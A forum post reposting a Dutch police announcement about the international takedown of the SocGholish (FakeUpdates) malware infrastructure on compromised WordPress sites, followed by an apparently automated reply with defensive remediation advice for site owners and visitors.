Malware News International law enforcement initiate hunt on malware group SocGholish

[nicolaasjan]

Content source

https://www.politie.nl/en/news/2026/juni/18/11-international-law-enforcement-initiate-hunt-on-malware-group-socgholish.html

In Operation Endgame, a major operation this week disrupted a key infection chain used by cybercriminals. Within an international cooperation, 14.971 websites infected with SocGholish malware were remediated. This malware is used by a criminal group that plays a pivotal role in international cybercrime, namely: Evil Corp.

SocGholish exploits hacked legitimate WordPress sites to spread malware to visitors, with the aim of gaining unauthorized access to their computer systems. WordPress is the world’s most widely used platform for building websites. According to WordPress, more than 43% of all websites on the internet are powered by WordPress. The login credentials of 1.4 million websites have been leaked. That means these sites are vulnerable to malware infection. About 14.971 sites that provide everyday services have been infected with this malware. This includes websites of restaurants or auto‑garages.

Maikel Rollman, National High Tech Crime Unit: 'With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware. It also reduces the risk that these systems are used for cyber‑attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish.'

14.971 websites remediated and disruption of the SocGholish botnet​

In the past few days, the Netherlands (NHCTU), Canada (RCMP), the United States (FBI) and Germany (BKA), with support from Europol and Eurojust, delivered a major blow to SocGholish’s criminal infrastructure during a joint action week.

Worldwide, 106 servers and domains were taken down. 14.971 websites have been remediated. In addition, the following actions were carried out:

• Cleaning infected WordPress sites and victim notification, urging previously infected WordPress owners to update their sites and change their login credentials.
• Disabling the SocGholish botnet by taking over domain names and taking servers offline.
• Victim notification for owners of WordPress sites whose leaked login credentials were identified by the police, via HaveIBeenPwned, DIVD, Spamhaus, CheckjeHack, NoMoreLeaks, The Shadowserver Foundation and NCSC (Netherlands).

 

[Bot]

This is a good reminder that “legitimate site” does not automatically mean “safe,” especially when common CMS platforms like WordPress get compromised and used as a malware delivery channel.

What SocGholish typically means in practice
SocGholish (often referred to as “FakeUpdates”) is commonly used as an initial access vector: a compromised website shows a convincing browser/update prompt and tries to trick visitors into running a downloader/installer. From there, attackers may pivot to additional malware and follow-on activity. That’s why disrupting its infrastructure and cleaning compromised sites can have an outsized impact.

If you own or manage a WordPress site
The most important takeaway isn’t only “update WordPress,” but to assume credentials and persistence mechanisms may exist if a site was exposed/compromised.

• Change all WordPress/admin/hosting/FTP/SSH/database passwords (use unique, long passwords) and enable MFA wherever possible.
• Update WordPress core, themes, and plugins; remove anything unused or unmaintained.
• Audit admin users (remove unknown accounts), API keys, and any new/modified plugins/themes.
• Check for persistence: scheduled tasks/cron jobs, modified wp-config.php, suspicious mu-plugins, new PHP files in uploads, and unexpected .htaccess rules.
• Review access logs for unusual admin logins and file changes; restore from a known-good backup if integrity is in doubt.
• Add hardening: least-privilege accounts, WAF/CDN rules, file integrity monitoring, and regular offsite backups.

If leaked credentials are part of the issue (as mentioned in the quoted text), treat that as a full credential compromise: rotating passwords without MFA and log review often isn’t enough.

If you’re a normal visitor/user

• Do not run “update” files offered by random websites. Browser/OS updates should come from the browser’s built-in updater or the official vendor site.
• If you suspect you downloaded or ran something from such a prompt, disconnect from the network and run full scans with reputable security software, then change passwords from a known-clean device.
• Consider checking email/password exposure via services like Have I Been Pwned (it’s for account exposure, not device infection, but it helps with credential hygiene).

Next step
Site owners should prioritize credential rotation + MFA and a compromise-focused integrity review (not just patching), because that’s what most reduces the chance of reinfection after a takedown/remediation wave.